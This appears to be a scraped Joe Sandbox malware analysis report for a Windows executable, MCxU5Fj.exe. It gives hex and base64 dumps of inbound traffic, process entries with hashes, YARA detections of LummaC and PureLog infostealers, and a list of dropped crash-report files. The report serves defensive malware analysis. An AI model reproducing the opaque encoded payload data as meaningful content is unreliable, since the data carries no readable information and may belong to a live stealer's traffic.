2939vSlseLAW/0ERBeFLjNG19/naIHUtAqG8pqWgZPedzYxlLTikOLIKPRncIS9U/UXjgCNQiSm2hZgjZPUo7im0bGm1LIB8H8r5NPiRG/lc5WJFsryZNXJNmHt16LlPIKRsqREAoJiKayE1/KA+kFlFT7HyoNUwtr1M5vnkFTPw0GQJ6TyAeN5WdPH99dtEbTXXXRdcjaG7gciKBfh01iBtOMCRMFCUyp4pTbgBv0gVcQZ5ztnpubPIxBZ8w
2025-03-05 08:12:56 UTC	1369	IN	Data Raw: 67 66 49 69 56 6c 65 43 63 32 6b 61 74 43 53 44 42 6d 70 6a 31 73 41 4f 42 58 31 44 52 46 56 62 56 32 47 72 35 7a 57 51 57 4d 4f 68 6b 72 5a 46 6f 4a 56 79 71 41 69 58 52 2f 63 6b 72 6a 43 48 68 2f 30 58 71 78 41 48 74 50 6e 6b 30 5a 74 30 59 35 4f 38 30 61 62 79 68 49 4b 53 70 66 4e 34 4f 52 4a 47 4d 64 59 36 45 55 56 78 2f 41 52 62 70 69 53 6e 2b 77 58 67 54 5a 61 78 68 46 36 77 67 61 4c 33 35 70 49 43 45 4d 73 37 35 51 63 51 46 43 70 55 68 6c 51 50 4a 73 33 79 64 77 56 35 4e 50 4b 36 78 78 42 7a 6d 51 47 56 77 4a 56 32 68 39 43 58 69 61 79 47 56 75 46 67 76 68 4b 6a 70 59 7a 56 6d 4c 47 55 74 67 71 33 38 39 33 57 51 30 4c 73 38 52 61 54 56 48 61 52 77 42 63 70 36 4d 54 33 63 69 55 71 45 50 66 51 58 4f 66 72 38 50 63 48 61 61 63 68 6d 36 52 68 59 64 32 Data Ascii: gfIiVleCc2katCSDBmpj1sAOBX1DRFVbV2Gr5zWQWMOhkrZFoJVyqAiXR/ckrjCHh/0XqxAHtPnk0Zt0Y5O80abyhIKSpfN4ORJGMdY6EUVx/ARbpiSn+wXgTZaxhF6wgaL35pICEMs75QcQFCpUhlQPJs3ydwV5NPK6xxBzmQGVwJV2h9CXiayGVuFgvhKjpYzVmLGUtgq3893WQ0Ls8RaTVHaRwBcp6MT3ciUqEPfQXOfr8PcHaachm6RhYd2
2025-03-05 08:12:56 UTC	1369	IN	Data Raw: 58 59 7a 35 66 4d 70 72 49 5a 48 4e 35 46 64 6b 4a 5a 51 62 66 56 61 70 6d 5a 58 4f 58 62 69 57 73 58 69 4a 4a 31 42 31 49 4b 55 64 71 41 43 34 30 72 37 34 68 66 41 6c 30 2f 44 59 37 52 2b 74 64 6e 67 59 62 62 34 30 33 4e 61 6c 34 52 67 33 4e 61 45 77 4c 56 32 4d 48 4e 54 61 4a 6c 69 5a 51 59 58 4b 69 50 33 4a 65 6b 58 57 50 4f 47 78 75 71 47 67 6f 6f 33 6f 2f 4d 66 6f 4c 57 79 70 34 52 43 73 6d 4a 61 4f 57 53 79 6b 6a 61 36 41 58 4f 6e 2f 71 44 61 74 36 46 47 6d 64 56 79 37 62 61 68 67 56 39 52 46 39 50 46 64 78 46 6a 63 59 74 61 74 37 53 78 6b 52 6f 78 35 36 61 4f 42 6d 73 32 5a 6e 62 37 70 31 50 59 70 41 4f 45 6a 38 45 30 77 5a 54 46 59 48 4f 6e 48 77 6b 58 31 42 47 78 54 2b 56 30 31 6f 6b 46 32 63 4f 32 70 36 76 7a 38 56 72 32 55 6c 4d 64 41 61 52 53 Data Ascii: XYz5fMprIZHN5FdkJZQbfVapmZXOXbiWsXiJJ1B1IKUdqAC40r74hfAl0/DY7R+tdngYbb403Nal4Rg3NaEwLV2MHNTaJliZQYXKiP3JekXWPOGxuqGgoo3o/MfoLWyp4RCsmJaOWSykja6AXOn/qDat6FGmdVy7bahgV9RF9PFdxFjcYtat7SxkRox56aOBms2Znb7p1PYpAOEj8E0wZTFYHOnHwkX1BGxT+V01okF2cO2p6vz8Vr2UlMdAaRS
2025-03-05 08:12:56 UTC	1369	IN	Data Raw: 58 67 72 7a 76 69 49 33 4a 6c 54 4b 4f 33 77 4a 31 57 6d 42 50 32 68 6f 6c 46 41 39 6d 56 6f 39 53 2f 77 79 58 46 42 4a 54 51 39 5a 47 5a 4b 53 50 46 38 4e 5a 63 59 6d 66 45 4c 56 55 34 38 6a 51 43 71 76 63 78 32 6f 54 52 4e 4f 67 6d 56 4e 41 33 52 33 41 52 6b 43 70 35 39 56 5a 51 74 6a 36 54 51 36 55 73 4a 61 31 68 31 37 55 4f 39 79 4e 64 74 4b 45 53 43 55 61 78 49 4a 4c 6b 55 39 4a 7a 6e 30 76 6e 35 52 50 6d 72 59 4c 44 78 36 77 48 4f 74 4b 55 56 58 72 6c 45 71 70 6d 38 4c 53 64 6f 59 61 6a 52 7a 65 68 73 4d 43 76 44 53 54 6c 38 67 5a 66 55 5a 66 67 65 57 43 37 56 30 52 6e 6d 4d 61 6c 53 4f 62 43 35 54 69 68 55 41 51 33 74 6c 4b 7a 6f 49 69 36 46 45 63 48 39 54 31 44 31 54 58 2b 70 4e 68 53 74 54 65 6f 4e 41 47 61 46 7a 49 53 2f 63 45 55 63 4b 61 31 45 Data Ascii: XgrzviI3JlTKO3wJ1WmBP2holFA9mVo9S/wyXFBJTQ9ZGZKSPF8NZcYmfELVU48jQCqvcx2oTRNOgmVNA3R3ARkCp59VZQtj6TQ6UsJa1h17UO9yNdtKESCUaxIJLkU9Jzn0vn5RPmrYLDx6wHOtKUVXrlEqpm8LSdoYajRzehsMCvDSTl8gZfUZfgeWC7V0RnmMalSObC5TihUAQ3tlKzoIi6FEcH9T1D1TX+pNhStTeoNAGaFzIS/cEUcKa1E
2025-03-05 08:12:56 UTC	1369	IN	Data Raw: 34 74 43 5a 77 34 53 32 69 6f 7a 56 4e 46 72 73 58 78 73 58 62 5a 39 4b 4c 52 73 52 54 76 2f 4e 52 67 65 62 7a 6f 6d 4e 52 57 4a 71 31 59 7a 63 78 50 72 50 56 63 66 6b 57 71 31 50 78 46 77 37 47 67 6d 68 56 45 41 4a 49 74 6f 65 69 4a 4f 63 41 4d 6b 43 36 65 72 63 47 74 38 59 73 4d 64 66 33 7a 39 57 34 51 39 61 6e 4f 30 55 43 48 66 54 77 6f 4b 69 53 39 64 54 6e 52 44 46 53 30 54 71 4b 52 68 54 69 68 2b 2f 41 67 2f 41 75 78 4e 70 78 64 41 59 61 67 32 47 49 51 39 47 44 6e 76 50 33 45 38 4c 6d 67 34 48 58 69 77 68 53 46 2f 46 67 76 2b 4e 55 6c 58 34 58 69 46 42 68 70 38 72 57 39 65 74 57 4d 55 4d 2f 55 53 62 43 4e 56 5a 42 6b 69 44 36 79 55 56 55 78 2f 63 76 45 36 50 78 76 79 62 6f 35 2f 53 55 69 73 55 69 72 66 53 77 41 2b 36 57 39 53 45 6e 78 58 66 41 55 6c Data Ascii: 4tCZw4S2iozVNFrsXxsXbZ9KLRsRTv/NRgebzomNRWJq1YzcxPrPVcfkWq1PxFw7GgmhVEAJItoeiJOcAMkC6ercGt8YsMdf3z9W4Q9anO0UCHfTwoKiS9dTnRDFS0TqKRhTih+/Ag/AuxNpxdAYag2GIQ9GDnvP3E8Lmg4HXiwhSF/Fgv+NUlX4XiFBhp8rW9etWMUM/USbCNVZBkiD6yUVUx/cvE6Pxvybo5/SUisUirfSwA+6W9SEnxXfAUl

Target ID:	0
Start time:	03:12:31
Start date:	05/03/2025
Path:	C:\Users\user\Desktop\MCxU5Fj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\MCxU5Fj.exe"
Imagebase:	0xeb0000
File size:	425'472 bytes
MD5 hash:	641525FE17D5E9D483988EFF400AD129
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1406285774.0000000000EB2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1470843231.0000000004339000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1470843231.0000000004339000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:12:31
Start date:	05/03/2025
Path:	C:\Users\user\Desktop\MCxU5Fj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\MCxU5Fj.exe"
Imagebase:	0x900000
File size:	425'472 bytes
MD5 hash:	641525FE17D5E9D483988EFF400AD129
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.2650627998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	03:12:31
Start date:	05/03/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 916
Imagebase:	0x610000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MCxU5Fj.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MCxU5Fj.exe_588fd21371929c281e65f3b6d351d45e72b15f_10a1e513_d045ade9-6a85-4ec5-99dd-0b587b0d093d\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC21C.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC317.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC347.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
MCxU5Fj.exe